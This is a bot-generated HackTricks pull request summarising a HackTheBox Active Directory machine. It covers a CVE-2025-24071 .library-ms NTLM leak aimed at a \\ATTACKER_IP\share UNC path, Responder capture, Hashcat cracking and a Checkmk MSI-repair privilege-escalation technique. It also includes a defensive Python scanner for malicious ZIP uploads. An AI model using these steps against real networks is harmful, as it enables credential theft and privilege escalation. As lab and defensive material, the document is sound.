
HTB NanoCorp CVE-2025-24071 NTLM Leak, AD ACL Abuse, Kerbero...#2410

Open
carlospolop wants to merge 1 commit into master from update_HTB_NanoCorp_CVE-2025-24071_NTLM_Leak_AD_ACL_Abu_254ad36c5f8ff1cf

Conversation

@carlospolop

Collaborator

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

🎯 Content Summary

NanoCorp is a Hard HackTheBox Windows Active Directory machine running nanocorp.htb on host DC01. The full attack path is: enumerate a Windows Server 2022 domain controller, discover a careers portal at hire.nanocorp.htb that accepts ZIP application uploads, exploit CVE-2025-24071 with a malicious .library-ms inside a ZIP to force outbound SMB authentication from the automated extraction job, capture and crack t...

🔧 Technical Details

Archive-triggered Net-NTLMv2 leak with .library-ms: If a Windows process automatically extracts or previews attacker-controlled archives, a malicious .library-ms file can embed a remote SMB URL such as \\ATTACKER_IP\share\ under <libraryDescription><searchConnectorDescriptionList><searchConnectorDescription><simpleLocation><url>...</url>. When Windows processes the library file, it resolves the UNC path and sends NTLM authentication to the attacker-controlled SMB listener. The attack pattern is: generate the XML, zip it, upload it into the target workflow, and run Responder with sudo uv run Responder.py -I tun0. The result is a Net-NTLMv2 challenge-response for the account processing the archive, which can be cracked offline with Hashcat mode 5600 if the password is weak.

AD ACL chaining from group membership control to password reset:

🤖 Agent Actions

Done.

Updated file

  • src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md

What I added

  • A new generalized section for Checkmk Agent / CVE-2024-0670 covering:
    • predictable temp .cmd execution from C:\Windows\Temp
    • spraying cmk_all_<PID>_1.cmd as read-only
    • ASCII batch payload requirement
    • mapping cached MSIs from C:\Windows\Installer
    • triggering repair with msiexec /fa
    • using qwinsta when repair behaves differently from non-interactive WinRM

Why only this

  • The repo already had good coverage for:
    • ZIP .library-ms NTLM leaks
    • AD ACL group membership + ForceChangePassword
    • LDAP signing / channel binding posture
    • Kerberos / Protected Users / WinRM basics

So the main missing technique from the blog was the Checkmk MSI-repair temp-script privesc pattern.

References added

  • 0xdf NanoCorp blog
  • SEC Consult advisory
  • Checkmk Werk #16361
  • RunasCs

Validation

  • Confirmed only one file was modified.
  • Confirmed the file still has a single ## References section and ends with the banner include.
  • mdbook build could not be run because mdbook is not installed in this environment.

This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.
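A defensive pre-check for the archive-upload workflow described in the summary, added here as an example (it is not code from the PR, the HackTricks repository or the 0xdf write-up): it scans a ZIP for .library-ms members whose simpleLocation url is a UNC path, so an automated extraction job can reject the archive before Windows resolves the path. The sample archive, its member names and the 203.0.113.5 address are constructed.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# A UNC target: either \\server\share\... or the forward-slash form //server/share.
UNC_RE = re.compile(r"^(\\\\|//)")


def _local(tag):
    """Strip the XML namespace ({...}name -> name) so the default library namespace does not matter."""
    return tag.rsplit("}", 1)[-1]


def library_ms_unc_urls(xml_bytes):
    """Return every <url> directly under a <simpleLocation> that points at a UNC path."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return []  # unparsable XML is not a library description; let other checks decide
    hits = []
    for loc in root.iter():
        if _local(loc.tag) != "simpleLocation":
            continue
        for child in loc:
            text = (child.text or "").strip()
            if _local(child.tag) == "url" and UNC_RE.match(text):
                hits.append(text)
    return hits


def scan_zip(zip_bytes):
    """Return [(member_name, [unc_urls])] for every .library-ms member that embeds a UNC URL."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".library-ms"):
                urls = library_ms_unc_urls(zf.read(info))
                if urls:
                    findings.append((info.filename, urls))
    return findings


def build_sample_zip():
    """Constructed sample: an application ZIP holding a benign file plus a library file with a UNC url."""
    lib = ('<?xml version="1.0" encoding="UTF-8"?>'
           '<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">'
           '<searchConnectorDescriptionList><searchConnectorDescription>'
           '<simpleLocation><url>\\\\203.0.113.5\\share\\</url></simpleLocation>'
           '</searchConnectorDescription></searchConnectorDescriptionList></libraryDescription>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("cv.txt", "plain text resume")   # constructed benign member
        zf.writestr("docs/cv.library-ms", lib)       # constructed suspicious member
    return buf.getvalue()
```

Any non-empty result from scan_zip is a reason to quarantine the upload rather than hand it to the extraction job; a local drive path in url (C:\...) is deliberately not flagged.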

@carlospolop

Collaborator Author

🔗 Additional Context

Original Blog Post: https://0xdf.gitlab.io/2026/06/20/htb-nanocorp.html

Content Categories: Based on the analysis, this content was categorized under "Windows Hardening > NTLM > Places to steal NTLM creds; Active Directory Methodology > Abusing Active Directory ACLs/ACEs; Windows Local Privilege Escalation".

Repository Maintenance:

  • MD Files Formatting: 977 files processed

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0
